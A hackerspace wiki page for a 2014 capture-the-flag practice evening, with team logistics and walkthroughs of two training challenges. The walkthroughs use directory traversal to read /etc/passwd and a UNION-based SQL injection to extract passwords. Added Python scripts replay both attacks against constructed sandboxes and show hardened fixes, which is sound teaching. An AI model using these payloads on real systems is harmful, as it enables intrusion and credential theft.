Latest revision as of 22:35, 13 January 2014
| CTF-practice-evening:2014-01-13 | |
|---|---|
| Date | 2014/01/13 |
| Time | |
| Location | Tech Inc |
| Type | Workshop |
| Contact | Melanie |
Capture The Flag evening - Part 4
- 13 January, 2014 - 8 PM
- Please bring a laptop!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
Our 1st CTF
- Positive Hack Days (PHDays) qualifier
- 48 hours: Jan. 25, 2014, 8 a.m. — Jan. 27, 2014, 8 a.m.
- http://quals.phdays.ru/
- Let's meet at Tech Inc on Saturday
- Jan 25 - 10 AM
- TODO: Add to Tech Inc event list
- Sunday is the Tech Inc ALV, so things won't be as organised that day.
- We are now registered for the Positive Hack Days, as team Knuffelhackers
- See: http://knuffelhackers.nl
- Stuff to prepare
- Stepping stone box (for storing tools, and allowing lots of people access)
- Edit pad - etherpad or https://quadpad.lqdn.fr
- We will want to archive this afterwards, for write-ups and stuff
- IRC channel - create a password-protected #techinc-ctf channel
- We have a mailing list already - http://technologia-incognita.nl/cgi-bin/mailman/listinfo/ctf
Web hacking!!!!
- Julius is talking about OWASP and Web Hacking this evening
- Topics: brute force, SQL injections, Network eavesdropping, XSS, Session hijacking
- Afterwards, Stef did some web hacking demonstrations, using Certified Secure
- Challenge: Herman Vluchtbeveiliging
- Add a single quote at the end of a URL parameter to see if it breaks the page
- Can we request an arbitrary file? Example: pagina=/etc/passwd
- This doesn't work, but the error message leaks the directory the pages are included from, so we know where we are in the filesystem
- With some directory traversal (../ sequences relative to that directory), we can dump the password file
- Challenge: Security Shop
- The Search Product field is injectable
- Once again we want an error that leaks information from the backend, so we start with a single quote
- This indeed gives us the SQL query, including part of the database schema (the column list of the search query)
- UNION appends the rows of a second SELECT to the result of the first; both SELECTs must return the same number of columns
- We can try UNION SELECT 1 --
- The error message says our SELECT doesn't match the column count of the original query (the error reported 5, while the payload that worked below uses four values, so read the count off the error rather than guessing it)
- We add placeholder columns until the error goes away: UNION SELECT 1,2,3,4 --
- Another expression that works often is VERSION()
- If we replace 3 with VERSION(), the MySQL version string is displayed; on Ubuntu packages it carries an Ubuntu build suffix, which is how the distribution shows up
- USER() also leaks information (the database account and the host it connects from)
- Trial and error works pretty well here: we need to select from other tables, and we can guess what they might be called (on MySQL 5 and later, information_schema.tables lists them, so guessing isn't required)
- You can query the password this way
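The Herman Vluchtbeveiliging traversal, replayed as an added example that is not part of the original notes or of the Certified Secure challenge: a toy `pagina=` include handler that leaks its base directory in the error and follows `../` out of it, next to a hardened version that resolves the path and refuses anything outside the pages directory. The directory tree, the page and the fake passwd file are constructed in a temporary directory for the demo.

```python
"""Added example (not from the original notes): a page-include handler with
the pagina= traversal bug shown in the walkthrough, and a hardened version.
The webroot, page and passwd file are constructed in a temp dir for the demo."""
import os
import shutil
import tempfile


def build_demo_tree():
    """Constructed sandbox: <root>/var/www/pages for pages, <root>/etc/passwd outside it."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(root, "var", "www", "pages")
    etc = os.path.join(root, "etc")
    os.makedirs(pages)
    os.makedirs(etc)
    with open(os.path.join(pages, "home"), "w") as f:
        f.write("<h1>Welkom</h1>\n")
    with open(os.path.join(etc, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed, not a real account
    return root, pages


def include_vulnerable(pages_dir, pagina):
    """Mirrors the challenge: the user-supplied name is glued onto the pages directory.
    pagina=/etc/passwd fails because it is taken relative to pages_dir, but the error
    echoes the full path, so ../ sequences can then walk up to the real /etc/passwd."""
    path = os.path.join(pages_dir, pagina.lstrip("/"))
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        # verbose error: this is what leaks the filesystem location
        return "Warning: include(%s): failed to open stream" % path


def include_hardened(pages_dir, pagina):
    """Resolve the final path and refuse anything that escapes pages_dir; reply generically."""
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, pagina.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        return "Error: page not found"  # no path in the reply, nothing to learn from it
    try:
        with open(target) as f:
            return f.read()
    except OSError:
        return "Error: page not found"


def demo():
    """Run the probe, the traversal and the hardened handler; return what each showed."""
    root, pages = build_demo_tree()
    try:
        probe = include_vulnerable(pages, "/etc/passwd")
        traversal = "../../../etc/passwd"  # pages -> www -> var -> root, then etc/passwd
        return {
            "probe_leaks_path": pages in probe,
            "vuln_dumps_passwd": include_vulnerable(pages, traversal).startswith("root:x:0:0"),
            "hardened_blocks": include_hardened(pages, traversal) == "Error: page not found",
            "hardened_serves_home": include_hardened(pages, "home").startswith("<h1>"),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The two fixes are independent and both matter: a generic error message stops step one of the walkthrough (learning where you are), and the `realpath` plus `commonpath` check stops step two even if the attacker already knows the layout.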
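The Security Shop UNION walk-through, replayed as an added example that is not part of the original notes or of the challenge: an in-memory SQLite shop whose search concatenates the term into the query, a probe that grows `UNION SELECT 1,2,...` until the column-count error disappears, extraction of the server version, the table list and a password through one placeholder column, and the parameterised query that closes the hole. The schema, table names and the `admin`/`hunter2` row are constructed for the demo; MySQL's `VERSION()` and `USER()` are stood in for by `sqlite_version()` because SQLite has no `USER()`, and `sqlite_master` plays the role of `information_schema.tables`.

```python
"""Added example (not from the original notes): the Security Shop UNION walk-through
against an in-memory SQLite database, plus the parameterised query that fixes it.
Schema, tables and rows are constructed for the demo; sqlite_version() stands in for
MySQL's VERSION()/USER(), and sqlite_master for information_schema.tables."""
import sqlite3


def build_shop():
    """Constructed shop database: a 4-column products table and a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, stock INTEGER);
        INSERT INTO products VALUES (1, 'Firewall', 99.0, 3), (2, 'Lockpick set', 25.0, 10);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');  -- constructed credential
    """)
    return db


def search_vulnerable(db, term):
    """String concatenation, as in the challenge: the term lands inside the quotes."""
    sql = "SELECT id, name, price, stock FROM products WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()


def search_safe(db, term):
    """Same query with a bound parameter: the term can never alter the statement."""
    sql = "SELECT id, name, price, stock FROM products WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


def probe(db, term):
    """Rows on success, else the database error text (what the challenge page echoed)."""
    try:
        return search_vulnerable(db, term)
    except sqlite3.Error as err:
        return "ERROR: " + str(err)


def find_column_count(db, max_cols=10):
    """Grow 'UNION SELECT 1,2,...' until the column-count error disappears."""
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        if not isinstance(probe(db, "x' UNION SELECT %s -- " % placeholders), str):
            return n
    return None


def extract(db, expression, source, column_count, slot):
    """Put `expression` into placeholder column `slot`; `source` is a FROM clause or None."""
    cols = [str(i) for i in range(1, column_count + 1)]
    cols[slot] = expression
    payload = "x' UNION SELECT %s" % ",".join(cols)
    if source:
        payload += " FROM " + source
    payload += " -- "  # comments out the closing %' of the original query
    return [row[slot] for row in search_vulnerable(db, payload)]


def demo():
    """Run the walkthrough end to end and return each step's result."""
    db = build_shop()
    n = find_column_count(db)
    return {
        "quote_breaks_query": isinstance(probe(db, "'"), str),
        "columns": n,
        "version": extract(db, "sqlite_version()", None, n, 1),
        # sqlite_master is SQLite's catalogue table: no guessing of table names needed
        "tables": sorted(extract(db, "name", "sqlite_master WHERE type='table'", n, 1)),
        "passwords": extract(db, "password", "users", n, 1),
        "safe_search": search_safe(db, "x' UNION SELECT 1,2,3,4 -- "),
    }


if __name__ == "__main__":
    print(demo())
```

The column-count loop is the automated form of the `UNION SELECT 1 --`, then `1,2,3,4 --` steps above; `extract()` is the "replace 3 with VERSION()" step generalised to any column and any source table. Against `search_safe()` the same payload is just a search term that matches nothing.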
Informational Links
Web-Hacking Wargames
- https://www.certifiedsecure.com - Start with this one!
- OWASP Web Goat (requires setting up a VM)
- https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - Web hacking stand-alone SW
- http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - Installation advice
- http://webappsecmovies.sourceforge.net/webgoat/ - solutions
- http://www.hackthissite.org